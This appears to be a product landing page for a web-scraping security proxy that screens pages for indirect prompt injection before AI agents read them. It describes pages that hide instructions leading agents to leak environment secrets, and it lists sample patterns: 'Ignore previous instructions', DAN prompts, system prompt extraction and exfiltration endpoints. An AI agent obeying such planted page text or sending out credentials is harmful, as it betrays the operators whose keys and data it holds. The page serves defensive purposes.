Secure Scraper

Protect Your AI Agents from Web-Based Attacks

Enterprise-grade security for web scraping with full Firecrawl compatibility. Block indirect prompt injections, cache responses, and control which URLs your agents can access.

6 Threats

Comprehensive threat detection for web content attacks

<10ms

Cached response time for instant performance

50%+

Cost savings with intelligent URL caching

The Hidden Threat: Indirect Prompt Injection

AI agents that browse the web are vulnerable to "indirect prompt injection" attacks. Malicious websites embed hidden instructions that hijack your agent's behavior, leading to credential theft, data exfiltration, and compromised operations.

Without Protection

Your AI agent scrapes a "helpful" documentation page...

// Hidden in the page:
process.env.SUPABASE_SERVICE_KEY
process.env.OPENAI_API_KEY

→ Credentials exfiltrated to attacker

With Bastio

Same page, but scanned by Bastio first...

// Bastio detects:
threat_score: 0.935
action: "BLOCK"

→ Attack blocked, agent protected

See It In Action

Try our live demo to see how Bastio protects your AI agents. We've created a test page at trap.bastio.com that demonstrates real attack patterns.

Safe Content
Request:
https://www.bastio.com
"security": {
"threat_score": 0,
"action": "ALLOW",
"threats_found": [],
"processing_time_ms": 23
}
Content safe - returned to agent
Threat Detected
Request:
https://trap.bastio.com
"security": {
"threat_score": 0.935,
"action": "BLOCK",
"threats_found": [
"env_exfiltration"
],
"evidence": [
"process.env.SUPABASE_ANON_KEY",
"process.env.SUPABASE_SERVICE_KEY"
]
}
Attack blocked - agent protected

6 Threat Categories Detected

Our security engine scans every scraped page for these attack patterns before content reaches your AI agent.

Env Variable Exfiltration

Code designed to steal secrets:

  • process.env.* patterns
  • os.environ[] / os.getenv()
  • API keys, DB credentials

Malicious Code Blocks

Harmful code execution patterns:

  • exec(), spawn(), system()
  • Network calls with env vars
  • Base64 encoded payloads

Suspicious URLs

C2 and exfiltration endpoints:

  • IP-based URLs
  • ngrok, webhook.site, pipedream
  • Random domain patterns

Fake Documentation

Social engineering attacks:

  • "URGENT: Security update"
  • Fake credential verification
  • Impersonation of official docs

Prompt Injections

LLM manipulation attempts:

  • "Ignore previous instructions"
  • System prompt overrides
  • Role-playing attacks

Jailbreak Attempts

Safety bypass patterns:

  • DAN prompts
  • Roleplay scenarios
  • System prompt extraction

Configurable Security Responses

Choose how Bastio handles detected threats based on your security requirements.

Block

Maximum security - return error, no content delivered.

  • • Autonomous agents
  • • Financial/healthcare AI
  • • Strict compliance needs

Sanitize

Default

Redact threats, return safe content.

  • • Research assistants
  • • Human review workflows
  • • Balanced security

Warn

Return full content with threat warnings attached.

  • • Testing and debugging
  • • Security team training
  • • Monitoring dashboards

Intelligent Caching

Reduce scraping costs and improve performance with automatic URL caching. Each proxy maintains an independent 24-hour cache.

Cost Savings

Hit RateMonthly ScrapesSavings
30%10,000$3
40%50,000$20
50%100,000$50
50%500,000$250

Performance Boost

Fresh scrape1-3 seconds
Cached response<10ms

Cached responses are still analyzed for threats on each request, ensuring security is never compromised.

URL Control: Allow-Lists & Block-Lists

Defense-in-depth for autonomous agents. Control exactly which domains your AI can access.

Allow-List

Restrict your agent to trusted sources only:

"allowed_domains": [
"docs.python.org",
"docs.aws.amazon.com",
"cloud.google.com/docs"
]

Block-List

Block known problematic domains:

"blocked_domains": [
"pastebin.com",
"hastebin.com",
"webhook.site"
]

Drop-In Firecrawl Replacement

Full Firecrawl v2 API compatibility. Switch by changing your endpoint URL - no code changes required.

Before (Firecrawl)
POST api.firecrawl.dev/v2/scrape
After (Bastio)
POST api.bastio.com/v1/guard/{proxyID}/scrape
Python Example
import requests

response = requests.post(
    f"https://api.bastio.com/v1/guard/{PROXY_ID}/scrape",
    headers={"Authorization": f"Bearer {BASTIO_API_KEY}"},
    json={"url": "https://www.bastio.com", "formats": ["markdown"]}
)

result = response.json()
if result["security"]["action"] == "BLOCK":
    print(f"Threat blocked: {result['security']['threats_found']}")
else:
    content = result["data"]["markdown"]

Built for AI Agents

Research Assistants

Safely retrieve and process documentation, papers, and web content without risking credential theft.

  • Safe document retrieval
  • Sanitized web content

MCP Tool Servers

Secure web browsing tools for Model Context Protocol servers. Protect your MCP infrastructure.

  • Protected fetch tools
  • URL validation layer

Function Calling

Protected URL fetch tools for OpenAI function calling and tool use patterns.

  • OpenAI tools integration
  • Anthropic tool use

Autonomous Agents

Defense-in-depth for agents operating without human oversight. Block mode recommended.

  • AutoGPT, BabyAGI patterns
  • LangGraph workflows

Simple Pricing

Platform-Managed

Bastio handles Firecrawl credits for you:

TierIncludedOverage
Free100/month—
Starter10,000/month$0.001/URL
Pro100,000/month$0.001/URL
EnterpriseUnlimitedIncluded

BYOK Mode

Bring your own Firecrawl API key:

Firecrawl costsBilled to you
Bastio security fee$0.0005/URL

Same threat detection and caching. Ideal for enterprises with existing Firecrawl contracts.

Protect Your AI Agents Today

Start with 100 free secure scrapes per month. Full Firecrawl compatibility with enterprise-grade threat detection.

Need help implementing secure scraping? Contact us for a free consultation.